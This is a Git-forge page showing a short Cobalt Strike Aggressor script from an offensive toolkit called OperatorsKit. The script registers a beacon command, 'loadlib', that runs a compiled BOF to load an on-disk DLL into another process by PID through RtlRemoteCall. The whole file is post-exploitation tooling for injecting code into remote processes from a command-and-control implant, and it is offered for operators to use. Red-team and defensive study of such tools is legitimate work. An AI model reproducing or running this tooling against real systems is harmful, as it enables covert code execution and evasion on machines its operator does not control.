Accueil Explorer Aide
Connexion
zhensolid
/
OperatorsKit
1
0
Fork 0
Fichiers Tickets 0 Pull Requests 0 Wiki
Aborescence: a2e6693e56
Branches Tags
OperatorsKit
/
KIT
/
LoadLib
/
loadlib.cna

loadlib.cna 961 B
Historique Raw

12345678910111213141516171819202122232425262728293031323334 
  1. # author REDMED-X
    2. 

  2. 

  3. beacon_command_register(
    4. 

  4. 	"loadlib", "Load DLL from disk in remote process via RPC call.",
    5. 

  5. 	"INFO:\nLoad a on disk present DLL via RtlRemoteCall API in a remote process.\nDepending on the process from which you run this tool, it may or may not work.\n\nOPTIONS:\n[pid]: target process to load the DLL into\n[path]: full path to the on disk present DLL\n\n" .
    6. 

  6. 	"USAGE:\nloadlib <pid> <path to dll>\n\n");
    7. 

  7. 

  8. 

  9. alias loadlib {
    10. 

  10.     $bid = $1;
    11. 

  11.     $pid = $2;
    12. 

  12.     $path = $3;
    13. 

  13. 	
    14. 

  14. 	if ($pid eq "" || $path eq "") {
    15. 

  15. 		berror($bid, "Please make sure that both the PID and PATH are specified.");
    16. 

  16. 		return;
    17. 

  17. 	}
    18. 

  18. 	
    19. 

  19. 	
    20. 

  20.     # Read in the right BOF file
    21. 

  21.     $handle = openf(script_resource("loadlib.o"));
    22. 

  22.     $data   = readb($handle, -1);
    23. 

  23.     closef($handle);
    24. 

  24. 	
    25. 

  25. 	
    26. 

  26.     # Pack our arguments
    27. 

  27.     $arg_data  = bof_pack($bid, "iz", $pid, $path);
    28. 

  28.     
    29. 

  29. 	blog($bid, "Tasked to load DLL in remote process..");
    30. 

  30. 	
    31. 

  31.     beacon_inline_execute($bid, $data, "go", $arg_data);
    32. 

  32. }
    33. 

  33. 

  34.